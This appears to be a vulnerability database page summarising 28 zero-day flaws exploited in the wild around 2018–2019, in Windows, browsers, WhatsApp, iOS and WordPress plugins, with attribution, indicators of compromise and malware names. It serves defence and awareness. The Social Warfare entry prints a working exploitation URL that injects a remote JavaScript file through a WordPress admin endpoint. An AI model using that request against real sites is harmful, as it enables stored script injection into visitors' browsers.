Zero-day Vulnerability Database

Zero-day vulnerabilities discovered: 28

Privilege escalation in Microsoft Windows
CVE-2019-1458

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note, this vulnerability is being actively exploited in the wild.

This vulnerability was reported by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. This vulnerability was used in Operation WizardOpium campaign against Korean users.

Software: Windows

Remote code execution in Draytek Vigor 2960, 3900 and 300B
CVE-2020-8515

Improper Neutralization of Special Elements in Output Used by a Downstream Component

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists because the affected devices allow remote code execution as root (without authentication) via shell metacharacters passed to the "cgi-bin/mainfunction.cgi" URI.

Note, this vulnerability is being actively exploited in the wild starting from December 4, 2019.

The vulnerability in WebUI of DrayTek Vigor enterprise routers is being exploited in the wild at least from December 4, 2019. Two affected scripts are believed to be used by two different attack groups to eavesdrop on FTP and email traffic inside corporate networks.

Software: Vigor 2960

Remote code execution in Microsoft Internet Explorer
CVE-2019-1429

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the scripting engine. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Software: Microsoft Internet Explorer

Remote code execution in Google Chrome
CVE-2019-13720

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing HTML content within the audio component. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.

Note, this vulnerability is being actively exploited in the wild.

Kaspersky Lab has identified in the wild exploitation of the vulnerability. This vulnerability was used in Operation WizardOpium campaign against Korean users.

Software: Google Chrome

Remote code execution in Microsoft Internet Explorer
CVE-2019-1367

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a use-after-free error within the scripting engine in JScript.dll. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

Software: Microsoft Internet Explorer

Privilege escalation in Microsoft Windows Winsock
CVE-2019-1215

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the ws2ifsl.sys (Winsock). A local user can run a specially crafted application, trigger memory corruption and execute arbitrary code on the target system with elevated privileges.

Note, this vulnerability is being actively exploited in the wild.

Software: Windows

Privilege escalation in Microsoft Windows CLFS
CVE-2019-1214

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows Common Log File System (CLFS) driver. A local user can create a specially crafted application and execute arbitrary code on the system with elevated privileges.

Note, this vulnerability is being actively exploited in the wild.

Software: Windows

Privilege escalation in Microsoft Windows Win32k component
CVE-2019-1132

NULL pointer dereference

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a NULL pointer dereference error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note, this vulnerability is being actively exploited in the wild.

The vulnerability was discovered by ESET in June 2019 when investigating a highly targeted attack in Eastern Europe. The vulnerability was used in a targeted attack against governmental institutions in Russia by an adversary known as Buhtrap.

Known IoCs:
sha1: CBC93A9DD769DEE98FFE1F43A4F5CADAF568E321

Software: Windows

Known/famous malware:

Win32/Exploit.CVE-2019-1132.A
VBA/TrojanDropper.Agent.ABM
VBA/TrojanDropper.Agent.AGK
Win32/Spy.Buhtrap.W
Win32/Spy.Buhtrap.AK
Win32/RiskWare.Meterpreter.G

Privilege escalation in Microsoft splwow64
CVE-2019-0880

Permissions, Privileges, and Access Controls

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to the way splwow64.exe handles certain calls. A local user can abuse this functionality to elevate privileges on an affected system from low-integrity to medium-integrity.

Note, this vulnerability is being actively exploited in the wild.

Software: Windows

Security restrictions bypass in Mozilla Firefox and Firefox ESR
CVE-2019-11708

Permissions, Privileges, and Access Controls

The vulnerability allows a remote attacker to bypass sandbox restrictions.

The vulnerability exists due to insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes. A remote attacker can create a specially crafted web page that can make the non-sandboxed parent process open web content chosen by a compromised child process.

An attacker can combine this behavior along with another vulnerability to execute arbitrary code on the system with privileges on the current user. 

Note, this vulnerability is being exploited in the wild along with SB2019061805 (CVE-2019-11707).

This vulnerability was used along with CVE-2019-11707 in a targeted attack against Coinbase.

Software: Mozilla Firefox

Remote code execution in Oracle WebLogic Server
CVE-2019-2729

Deserialization of Untrusted Data

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insecure input validation when processing serialized data within XMLDecoder class. A remote non-authenticated attacker can pass specially crafted data to the application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

Oracle has released a security alert notifying users of in-the-wild exploitation of the vulnerability.

Software: Oracle WebLogic Server

Remote code execution in Mozilla Firefox and Firefox ESR
CVE-2019-11707

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error when manipulating JavaScript objects due to issues in Array.pop. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild along with SB2019062002 (CVE-2019-11708).

The vulnerability was reported by Mozilla to be actively exploited in the wild.

This vulnerability was reportedly used in a targeted attack against Coinbase employees on Monday, June 17 2019.

The vulnerability was used in conjunction with another sandbox bypass issue CVE-2019-11708, patched by Mozilla on June 20, 2019.

This vulnerability was independently discovered and reported to Mozilla by a security researcher Samuel Groß on April 15. It took Mozilla 64 days to issue a security fix.


Software: Mozilla Firefox

Privilege escalation in Windows Error Reporting
CVE-2019-0863

Input validation error

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to the way Windows Error Reporting (WER) handles files. A local user can create a specially crafted WER file and execute arbitrary code on the system in kernel mode.

Note: this vulnerability is being actively exploited in the wild.

Software: Windows

Remote code execution in WhatsApp
CVE-2019-3568

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the WhatsApp VOIP stack when processing SRTCP packets. A remote attacker can send a series of specially crafted SRTCP packets sent to a target phone number, trigger buffer overflow and execute arbitrary code on the target device.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

The vulnerability was used in a targeted attack against a limited number of people. First vulnerability exploitation was detected on May 12 2019. The attackers targeted a phone of a UK-based human rights lawyer to install spyware.

Software: WhatsApp Messenger for Android

Known/famous malware:

Pegasus

Improper access control in Yuzo Related Posts WordPress plugin

Improper access control

The vulnerability allows a remote attacker to gain unauthorized access to the website.

The vulnerability exists due to improper access restrictions when processing HTTP requests. A remote attacker can pass a specially crafted configuration to the affected application and inject arbitrary JavaScript code into the WordPress configuration.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable application.

Note: the vulnerability is being actively exploited in the wild.

Not patched

Improper access control vulnerability in the plugin allowed attacker to inject malicious JavaScript code and redirect users to phishing websites.

Software: Related Posts

Privilege escalation in Win32k.sys driver in Microsoft Windows
CVE-2019-0859

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note: this vulnerability is being actively exploited in the wild.

The vulnerability was reported to Microsoft by Vasily Berdnikov and Boris Larin from Kaspersky Lab.

Software: Windows

Privilege escalation in Win32k.sys driver in Microsoft Windows
CVE-2019-0803

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when processing objects in memory within the Microsoft Graphics Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note: this vulnerability is being actively exploited in the wild.

The vulnerability was reported to Microsoft by Donghai Zhu of Alibaba Cloud Intelligence Security Team.

Software: Windows

Backdoor in Asus Live Update

Hidden functionality (backdoor)

The vulnerability allows a remote attacker to compromise the vulnerable system.

The vulnerability exists due to hidden functionality (a backdoor) present in the software. A remote attacker can use this functionality to gain full access to the application and compromise the affected system.

Note: this backdoor was implanted as a result of the compromise of ASUS servers during the APT attack dubbed "Operation ShadowHammer". The campaign ran from June to at least November 2018.

An APT campaign was launched against ASUS between June and November 2018. The attacker compromised ASUS Live Update servers and distributed malware to approximately 1 million computers worldwide.

The attack was attributed to APT17 adversary, also known as Deputy Dog.

Software: ASUS Live Update

Stored XSS in Social Warfare WordPress plugin
CVE-2019-9978

Cross-site scripting

The vulnerability allows a remote attacker to perform cross-site scripting attacks.

The vulnerability exists due to usage of the eval() JavaScript call on data passed via the "swp_url" HTTP GET parameter to the "/wp-admin/admin-post.php" script when "swp_debug" is set to "load_options", allowing an attacker to permanently inject and execute arbitrary JavaScript code on the website. A remote unauthenticated attacker can store specially crafted JavaScript code in the database and execute it in the browser of every website visitor.

Note: this vulnerability is being actively exploited in the wild.

Exploitation example:

http://[host]/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[malicious_js_script]/

A stored XSS vulnerability in the Social Warfare plugin, used by 70 000 users, led to a mass hacking campaign of WordPress websites.

Software: WordPress Social Sharing Plugin – Social Warfare

Insecure deserialization in Easy WP SMTP plugin for WordPress

Deserialization of Untrusted Data

The vulnerability allows a remote attacker to compromise vulnerable website.

The vulnerability exists due to insecure input validation when processing serialized data passed via the "swpsmtp_import_settings" HTTP POST parameter to /easy-wp-smtp.php script. A remote unauthenticated attacker can import arbitrary wp_options and reconfigure WordPress to allow user registration with administrative privileges.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable website.

Note: this vulnerability is being actively exploited in the wild.

WordPress websites were under attack due to vulnerability in a popular WP plugin since March 15, 2019.

Software: Easy WP SMTP

Privilege escalation in Microsoft Windows Win32k.sys driver
CVE-2019-0797

Memory corruption

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Win32k.sys driver. A local user can execute a specially crafted application, trigger memory corruption and execute arbitrary code on the target system with elevated privileges.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Kaspersky Lab has detected and reported a zero-day vulnerability in Win32k.sys driver in Microsoft Windows.

Software: Windows

Privilege escalation in Microsoft Windows
CVE-2019-0808

NULL pointer dereference

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a NULL pointer dereference error in win32k!MNGetpItemFromIndex, reached through the NtUserMNDragOver() system call within the win32k.sys kernel driver. A local user can use a specially crafted application to escape the sandbox and execute arbitrary code on the target system with SYSTEM privileges.

Note, this vulnerability is being actively exploited in the wild along with vulnerability in Google Chrome described in (SB2019030405).

On March 7th Google reported in-the-wild exploitation of a vulnerability in Microsoft Windows. During the attack the adversary used another zero-day vulnerability in Google Chrome to execute code on the system and the vulnerability in Microsoft Windows to escalate privileges.
The initial attack was detected in late February.

Software: Windows

Remote code execution in Google Chrome
CVE-2019-5786

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error in FileReader. A remote attacker can trick the victim into opening a specially crafted file with Google Chrome, trigger use-after-free error and execute arbitrary code on the target system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note: the vulnerability is being exploited in the wild.

The vulnerability in Google Chrome was used in a targeted attack along with another zero-day in Microsoft Windows.

The initial attack was detected in late February.

Software: Google Chrome

Dangerous file upload in Adobe ColdFusion
CVE-2019-7816

Dangerous file upload

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insufficient validation of user-supplied input when processing file uploads. A remote attacker can upload and execute arbitrary code on the target system with privileges of the ColdFusion service. Successful exploitation of the vulnerability requires that the attacker has the ability to upload files.

Note, this vulnerability is being actively exploited in the wild.

Software: ColdFusion

Information disclosure via PDF files in Google Chrome

Exposed dangerous method or function

The vulnerability allows a remote attacker to gain access to potentially sensitive information.

The vulnerability exists because the PDF viewer allows information to be sent to a third-party domain via the "this.submitForm()" PDF JavaScript API. A remote attacker can trick the victim into opening a specially crafted PDF file with Google Chrome and obtain sensitive information.

Note: the vulnerability is being actively exploited in the wild.

Not patched

Vulnerability exploitation was spotted by EdgeSpot in late December 2018. The company detected multiple PDF samples in the wild that use a dangerous JavaScript method to send information retrieved from the user's computer to a third-party domain.

Software: Google Chrome

Information Disclosure in Microsoft Internet Explorer
CVE-2019-0676

Out-of-bounds read

The vulnerability allows a remote attacker to gain access to potentially sensitive information.

The vulnerability exists due to a boundary error when processing HTML content. A remote attacker can trick the victim into opening a specially crafted webpage, trigger an out-of-bounds read and test for the presence of files on disk.

Software: Microsoft Internet Explorer

Multiple vulnerabilities in Apple iOS
CVE-2019-7287

Privilege escalation

The vulnerability allows a local attacker to gain elevated privileges.

The weakness exists due to a boundary error in the IOKit component when handling malicious input. A local attacker can run a specially crafted application, trigger memory corruption and execute arbitrary code with elevated privileges.

Successful exploitation of the vulnerability may result in system compromise.

Note: according to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.

According to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.

Software: Apple iOS

Multiple vulnerabilities in Apple iOS
CVE-2019-7286

Memory corruption

The vulnerability allows a local attacker to gain elevated privileges.

The weakness exists due to a boundary error in the Foundation component when handling malicious input. A local attacker can run a specially crafted application, trigger memory corruption and gain elevated privileges.

Note: according to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.

According to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.

Software: Apple iOS
